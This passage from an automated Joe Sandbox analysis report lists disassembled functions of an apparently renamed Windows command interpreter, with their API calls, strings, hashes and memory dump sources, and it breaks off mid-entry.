                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                          • String ID: :$\
                                                                                          • API String ID: 3961617410-1166558509
                                                                                          • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                          • Instruction ID: 2264c39bac29fb975f1600371809a4eb1706ec8d14c398e4016747575c2a893d
                                                                                          • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                          • Instruction Fuzzy Hash: E121C432A0D743A6EB148B74A444079B6A1FFCDB95B588271EA0FC3790EF3CD4489601
                                                                                          Function 00007FF6A0E77AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                          • String ID:
                                                                                          • API String ID: 1397130798-0
                                                                                          • Opcode ID: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                          • Instruction ID: 60f8514bd1aeebbaf22c9cab85ddee2eac99c6b10e0f45ab367bec43a5b15a46
                                                                                          • Opcode Fuzzy Hash: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                          • Instruction Fuzzy Hash: AB919832B0A783A6FB658B11D4402B9B3A1FF88B85F598135DA8E87795DF3CD544E700
                                                                                          Function 00007FF6A0E8258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806D6
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806F0
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E8074D
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E80762
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E825CA
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E825E8
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E8260F
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E82636
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E82650
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp$Heap$AllocProcess
                                                                                          • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                          • API String ID: 3407644289-1668778490
                                                                                          • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                          • Instruction ID: 63e158f1a6b2e493dea714cb79fbdd183697de8c80dabeb9cf08d5df6d504552
                                                                                          • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                          • Instruction Fuzzy Hash: 0F313071A1E603A6F7105F21E8113796AA5BF99B81F548439DA0EC63E5EF3CE408F711
                                                                                          Function 00007FF6A0EA0C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                          • API String ID: 2516562204-381716982
                                                                                          • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                          • Instruction ID: 03eade065005e565545f7eef0fff0d0e433fa55bb52eae43a87d5c186de7d754
                                                                                          • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                          • Instruction Fuzzy Hash: B4C1AF32B066529AEB648F25E84027EB7B0FB48B95F545135EE8D93B94DF3CE490E700
                                                                                          Function 00007FF6A0E87E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D46E
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D485
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D4EE
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: iswspace.MSVCRT ref: 00007FF6A0E7D54D
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D569
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D58C
                                                                                          • iswspace.MSVCRT ref: 00007FF6A0E87EEE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                          • String ID: A
                                                                                          • API String ID: 3731854180-3554254475
                                                                                          • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                          • Instruction ID: e2cd61ade22bafa0c19ae0d6180be8071a37c40e5249fd312e4577070c3299e5
                                                                                          • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                          • Instruction Fuzzy Hash: DEA18E32E0B783AAE7609B61A440279B7A0FF89790F548035DA9DC77A5EF3CE445E700
                                                                                          Function 00007FF6A0E9A39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                          • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                          • API String ID: 1580871199-2613899276
                                                                                          • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                          • Instruction ID: e9f8530b274019a13c35c1d07dc104d13467a953543a16a76a193cc375f59e8d
                                                                                          • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                          • Instruction Fuzzy Hash: 86519F72B1AB8392EB508B25E800279B7B4FF88B85F595135EA5E83B94DF3CE411D740
                                                                                          Function 00007FF6A0E77420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                          • String ID: con
                                                                                          • API String ID: 689241570-4257191772
                                                                                          • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                          • Instruction ID: 0274006f04b32b81adcb5aafb63e4506b0273c94bc1ca12cc19a4808e3261c44
                                                                                          • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                          • Instruction Fuzzy Hash: 5541C436A0974697E3108F259484379BAA1FB8DBA5F648334DE6D833D4DF3CD8499780
                                                                                          Function 00007FF6A0E9A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                          • String ID: PE
                                                                                          • API String ID: 2941894976-4258593460
                                                                                          • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                          • Instruction ID: 658ba53696c449f393504f4727f5440a95b31446592d24778806714ab9b0308b
                                                                                          • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                          • Instruction Fuzzy Hash: D9418E71609793A6EA208B11E41027AFBA0FF89BD1F484231EE9D83B95DF3CE455DB40
                                                                                          Function 00007FF6A0E80010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6A0E9849D,?,?,?,00007FF6A0E9F0C7), ref: 00007FF6A0E80045
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6A0E9F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E80071
                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E80092
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6A0E800A7
                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E80148
                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6A0E80181
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                          • String ID:
                                                                                          • API String ID: 734197835-0
                                                                                          • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                          • Instruction ID: 5e4973f028198ab8c6ba09249c9622450de310072cb6f47662f0fb61c47c708d
                                                                                          • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                          • Instruction Fuzzy Hash: 02619432E0E693AAE7608B25A8043797BA1BB89B55F448131DD9EC3795DF3CA449E700
                                                                                          Function 00007FF6A0E99B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Enum$Openwcsrchr
                                                                                          • String ID: %s=%s$.$\Shell\Open\Command
                                                                                          • API String ID: 3402383852-1459555574
                                                                                          • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                          • Instruction ID: de9aa223e584927818a56efc5ae29e946791a1c024a65473f014f2a003b068a0
                                                                                          • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                          • Instruction Fuzzy Hash: EFA1B172A0A683A3EE109B59E4502BAE2A0FF85BD0F944531DA4E877D5EF7CED41D300
                                                                                          Function 00007FF6A0E87610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$wcscmp
                                                                                          • String ID: %s
                                                                                          • API String ID: 243296809-3043279178
                                                                                          • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                          • Instruction ID: 269e0ad1386bfb1413ca2fdf6a876ec6c0e71df9f0a399257e0e315a2ce8a572
                                                                                          • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                          • Instruction Fuzzy Hash: FCA17E32B0AB87A6EB65DB21D8903F963A0FB48749F144036DA4D87795EF3CE649D300
                                                                                          Function 00007FF6A0E71F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$EnvironmentVariable
                                                                                          • String ID: DIRCMD
                                                                                          • API String ID: 1405722092-1465291664
                                                                                          • Opcode ID: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                          • Instruction ID: 8dda3b96f36f566e64158eb1e224687d7da104e9b7fa2fc1b40c95090797352f
                                                                                          • Opcode Fuzzy Hash: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                          • Instruction Fuzzy Hash: 57815F72A0ABC29AEB20CF60E8802ED77E5FB49748F504139DA8D97B59DF38D255D700
                                                                                          Function 00007FF6A0E799F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • wcschr.MSVCRT(?,?,?,00007FF6A0E799DD), ref: 00007FF6A0E79A39
                                                                                            • Part of subcall function 00007FF6A0E7DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF6A0E7CEAA), ref: 00007FF6A0E7DFB8
                                                                                            • Part of subcall function 00007FF6A0E7DF60: RtlFreeHeap.NTDLL ref: 00007FF6A0E7DFCC
                                                                                            • Part of subcall function 00007FF6A0E7DF60: _setjmp.MSVCRT ref: 00007FF6A0E7E03E
                                                                                          • wcschr.MSVCRT(?,?,?,00007FF6A0E799DD), ref: 00007FF6A0E79AF0
                                                                                          • wcschr.MSVCRT(?,?,?,00007FF6A0E799DD), ref: 00007FF6A0E79B0F
                                                                                            • Part of subcall function 00007FF6A0E796E8: memset.MSVCRT ref: 00007FF6A0E797B2
                                                                                            • Part of subcall function 00007FF6A0E796E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E79880
                                                                                          • _wcsupr.MSVCRT ref: 00007FF6A0E8B844
                                                                                          • wcscmp.MSVCRT ref: 00007FF6A0E8B86D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                          • String ID: FOR$ IF
                                                                                          • API String ID: 3663254013-2924197646
                                                                                          • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                          • Instruction ID: aca1efef3432236f12edc8d61b4727c8b43886cbee9c64109d6b98edc9748058
                                                                                          • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                          • Instruction Fuzzy Hash: EA51AC31F0BB43A6FE58AB25945027966A1FF89B90F584235DA1ED77D2DE3CE805A300
                                                                                          Function 00007FF6A0E7F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F0D6
                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1BA
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F1E7
                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1FF
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F2BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
